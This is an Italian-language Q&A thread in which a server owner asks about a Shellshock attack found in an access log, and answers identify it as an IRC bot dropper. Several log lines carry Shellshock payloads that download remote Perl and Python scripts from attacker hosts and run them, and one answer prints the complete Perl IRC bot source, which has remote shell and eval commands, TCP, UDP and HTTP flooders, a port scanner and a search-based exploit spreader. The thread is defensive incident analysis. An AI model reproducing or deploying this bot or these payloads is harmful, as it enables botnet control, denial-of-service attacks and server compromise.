È un attacco o qualcosa di cui preoccuparsi? Shellshock?


23

access.logHo visto questo nel mio server di prova:

> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

Nessuno degli indirizzi è correlato a me o al nostro intervallo di indirizzi IP (o qualsiasi altra cosa del resto) Stavo immediatamente pensando al bug di sicurezza Shellshock / "bashdoor".

In realtà sembra che qualcuno abbia provato a curl"qualcosa" fino al server, quindi abbia eseguito quel "qualcosa" e dopo aver eliminato "qualcosa" con -rf.

Questo è un server di test puro, non viene fatto alcun danno (== nessun danno può essere fatto oltre alla reinstallazione) - ma i tempi sono molto interessanti. Non ho mai visto nulla di simile prima, per quanto ricordo.

Dovrei preoccuparmi, ad esempio, essere "interessato"? Qualcuno ha idea di cosa sia?


4
È qualcuno che sfrutta il bug Shellshock. Puoi determinare cosa stava facendo lo script perl? Vale sicuramente la pena che ti interessi. L'URL da cui è stato scaricato non è più utile, ma esiste 213.5.67.223/ji e dovrebbe essere colpito. Sembra essere uno script IRC.
— Aviator45003,

2
Il mio antivirus dice che è il trojan Perl / Shellbot.NAK.Gen .
— nyuszika7h,

2
Non sappiamo nemmeno se l'exploit è riuscito, giusto?
— Jonas Schäfer,

1
Avast afferma che superuser.com/questions/818257/… è infetto da Perl: Shellbot-N [Trj]
— DavidPostill

Risposte:


16

È qualcuno che sfrutta il bug Shellshock. Puoi determinare cosa stava facendo lo script perl? Vale sicuramente la pena che ti interessi. Il secondo URL utilizzato restituisce un 404, ma http://213.5.67.223/jiesiste e potrebbe essere la stessa cosa, visto che è uno script perl. Sembra essere un server IRC di qualche tipo, quindi la connessione al server di prova con un client IRC potrebbe rivelarsi interessante. EDIT: il commento mi ha corretto, è un cliente, così capace di curiosare con te.

Inoltre, controlla se lo script perl è ancora in esecuzione.

#!/usr/bin/perl
# ------------------------------------------------------------- #
#           LinuxNet perlbot            #
# ------------------------------------------------------------- #

#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`");

my $processo = '-';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='7';
my $sleep='7';
my @adms=("x","JB" );
my @hostauth=("localhost","outlaw");
my @canais=("#gnu");
my $nick='|GNU|';
my $ircname ='GNU';
chop (my $realname = `uname -sr`);
$servidor='ircd.w3h.co.uk' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         } 
       }
    }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4; 
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}


sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
         my $itime = time;
         my ($cur_time);
             $cur_time = time - $itime;
         while ($3>$cur_time){
             $cur_time = time - $itime;
         &tcpflooder("$1","$2","$3");
             }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
           }
       if ($funcarg =~ /^version/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);           
        }
           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
         srand;
         my $itime = time;
         my ($cur_time);
         my ($exploited);
         $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
        while($1>$cur_time){
            $cur_time = time - $itime;
            @urls=fetch();
            foreach $url (@urls) {
            $cur_time = time - $itime;
            my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

            $url =$path."/$goni$boturl" ;




            $page = http_query($url);
            $exploited = $exploited + 1;
            }
        }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
         my $itime = time;
         my ($cur_time);
             $cur_time = time - $itime;
         while ($2>$cur_time){
             $cur_time = time - $itime;
         my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
         close($socket);
             }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
           }
           exit;
       }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   } 

if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
 }

   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  } 
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}  
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(5)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
        "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
        "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
        "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
        "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
        "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
        "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
        "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",      
        "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
        "vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom  (@dominios)
{
    push (@str,"allinurl:%22".$dom."/".$goni."%22");
}

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";


    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
    if ($1 !~ m/google|cache|translate/){
        push (@lst,$1);
    }
    }
    return (@lst);
}


sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;

    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
    local $SIG{ALRM} = sub { die "1";};
    alarm 10;
    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
    print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
    my @r = <$sock>;
    $page="@r";
    alarm 0;
    close($sock);
    };    
    return $page;

}

2
In realtà è un client IRC , non un server.
— nyuszika7h,

2
ps -ax | grep perloppureps ax | grep perl
— Aviator45003,

Grazie! Vorrei poter votare di più. Secondo il registro, stamattina c'è stato un nuovo tentativo (da un altro IP) e usando ps -efposso vedere che c'è un /usr/sbin/apache2 -k startcon lo stesso identico timestamp :( Quindi immagino che l'attacco sia andato a buon fine. Ho aggiornato bash consudo apt-get update && sudo apt-get install --only-upgrade bash
— davidkonrad

È la seguente linea nella shellroutine che mi ha fatto preoccupare: my @ resp = $comando 2>&1 3>&1; Nessun danno fatto per quanto ne so.
— wcochran,

6

La vulnerabilità di Shellshock viene utilizzata per scaricare (utilizzando wget) ed eseguire uno script Perl dannoso, questo attacco è molto semplice e richiede l'installazione di Perl e wget (supponendo che uno di essi non lo sia e sei sicuro che non ci siano altri tentativi di cracking, il tuo server non è stato compromesso).

Lo stesso script è un bot IRC di base per script, una volta eseguito che merda si collega a un server IRC e attende comandi, sembra che abbia funzionalità di ricerca di Google, molto probabilmente per cercare automaticamente host vulnerabili e tentare di sfruttarli. A parte questo, ovviamente, hai l'arsenale di base skiddie, che è HTTP flood, TCP e UDP flood e accesso shell (come l'utente che ha eseguito lo script, che sarebbe l'utente con cui viene eseguito il server HTTP).


1

Come già detto da altri, si tratta di un tentativo di script kiddie di sfruttare la vulnerabilità bash per eseguire un bot IRC basato su script perl. Se hai aggiornato bash e, inoltre, se esegui apache sotto chroot come faccio io, non hai nulla di cui preoccuparti. Vedo diverse versioni di questo sul mio registro (vedi sotto) almeno a giorni alterni dal 27/09 ... questo è solo un rumore.

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

Un'altra varietà di tentativi di esecuzione di script (script Python) che ho appena notato oggi ... NOTA: google-traffic-analytics.com dove lo script Python viene scaricato non ha nulla a che fare con Google ovviamente.

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.